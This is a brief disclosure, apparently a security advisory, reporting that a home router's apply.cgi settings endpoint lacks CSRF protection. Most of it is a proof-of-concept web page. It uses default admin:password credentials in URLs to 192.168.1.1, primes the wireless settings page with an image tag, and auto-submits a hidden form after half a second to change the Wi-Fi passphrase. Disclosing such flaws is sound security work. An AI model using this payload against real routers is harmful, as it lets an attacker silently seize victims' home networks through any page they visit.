There is no CSRF protection at all.
Settings applied to http://admin:password@192.168.1.1/apply.cgi are completely unprotected.

Take the example below of changing the wireless password:

<img src="http://admin:password@192.168.1.1/apply.cgi?/WLG_wireless.htm%20timestamp=45839128">
<form id="attackform" method="post" action="http://admin:password@192.168.1.1">
<input type="hidden" name="passphrase"	value="fearlessbutter">
<input type="hidden" name="passphrase_anpassphrase"	value="fearlessbutter">
<!-- Rest of POST request goes here -->
</form>
<script>
setTimeout(function(){document.getElementById("attackform").submit();},500);
</script>